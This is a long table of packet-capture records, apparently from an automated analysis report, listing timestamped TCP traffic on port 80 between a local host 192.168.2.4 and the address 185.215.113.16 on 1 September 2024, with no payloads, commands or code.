Sep 1, 2024 20:09:07.222796917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.222817898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.222831011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.222851992 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.223004103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223047018 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.223063946 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223076105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223086119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223110914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.223124981 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.223637104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223649979 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223659992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223675966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223684072 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.223689079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.223721981 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.223743916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.224180937 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.224194050 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.224203110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.224212885 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.224227905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.224231958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.224252939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.224277020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.623285055 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623434067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623445034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623475075 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.623500109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.623661995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623672962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623683929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623694897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.623716116 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.623728991 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.624175072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624186039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624196053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624207973 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624224901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.624248028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.624768019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624778986 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624789953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624799967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.624818087 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.624829054 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.624862909 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.625283003 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625293970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625303984 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625315905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625327110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625339985 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.625343084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625354052 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.625365973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.625386953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.625413895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.626265049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.626276016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.626286983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.626298904 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.626310110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.626315117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.626322985 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.626343012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.626357079 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.626383066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.627259016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627271891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627281904 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627294064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627305031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627310038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.627316952 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627329111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627336025 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.627340078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.627353907 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.627389908 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.628262997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.628276110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.628287077 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.628298998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.628310919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.628323078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.628323078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.628343105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.628357887 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.629261971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629273891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629285097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629297018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629309893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629317045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.629323959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629333019 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.629336119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629348040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.629357100 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.629381895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.629391909 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.635282993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.635354996 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.635381937 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.635395050 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.635437965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.637315989 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.637362003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.637415886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.637425900 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.637468100 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.638156891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.638206959 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.638242006 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.638252974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.638289928 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.638438940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.638448000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.638499022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.638514996 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.834918976 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.834974051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.835191965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.835191965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.919282913 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.919337034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.919359922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.919400930 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.022532940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.022610903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.022624016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.022718906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.022718906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.022718906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.022896051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.022907972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.022918940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.022948980 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.022972107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.023365021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.023376942 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.023386002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.023396969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.023406982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.023416996 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.023421049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.023442030 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.023452044 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.023487091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024198055 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024209023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024219036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024230003 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024252892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024271011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024790049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024806976 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024817944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024828911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024837971 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024842024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024853945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024861097 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024867058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.024884939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024899960 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.024921894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.025782108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.025794983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.025804043 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.025815010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.025826931 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.025832891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.025839090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.025856972 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.025867939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.025892973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.026763916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026776075 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026786089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026802063 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026813030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026818037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.026825905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026837111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.026845932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.026860952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.026875973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.027779102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027795076 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027806044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027817011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027829885 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027832031 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.027842045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027853012 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.027858973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.027883053 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.027892113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.028760910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.028772116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.028781891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.028793097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.028804064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.028812885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.028815031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.028842926 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.028856039 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.029736042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029747963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029757023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029767990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029778004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029791117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029793024 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.029803038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.029814005 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.029833078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.029844046 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.030535936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030548096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030558109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030569077 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030580044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030585051 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.030591011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030602932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030611992 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.030613899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.030627012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.030649900 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.030672073 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.031486034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031497002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031507015 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031517029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031527042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031539917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031548023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.031550884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031563997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031573057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.031574011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.031585932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.031609058 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.031631947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032350063 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032361031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032371998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032387018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032393932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032397985 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032413006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032428980 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032438040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032852888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032862902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032867908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032877922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032886982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032898903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032903910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032908916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.032919884 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032943964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.032957077 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.033580065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033591986 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033601046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033612013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033622026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033632040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033632040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.033643961 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033653975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.033657074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.033673048 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.033690929 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.034487963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034499884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034507990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034518957 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034529924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034545898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034550905 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.034557104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034568071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.034570932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.034584045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.034610033 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.035418034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035429001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035438061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035449028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035459042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035470009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035470009 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.035476923 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.035482883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035494089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.035506964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.035536051 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.036350965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036361933 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036376953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036389112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036398888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036401987 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.036412001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036415100 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.036423922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036434889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036442995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.036442995 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.036473036 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.036484957 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.107219934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107327938 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107338905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107389927 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.107389927 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.107579947 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107590914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107600927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107611895 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.107633114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.107665062 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108055115 CEST	80	49738	185.215.113.16	192.168.2.4
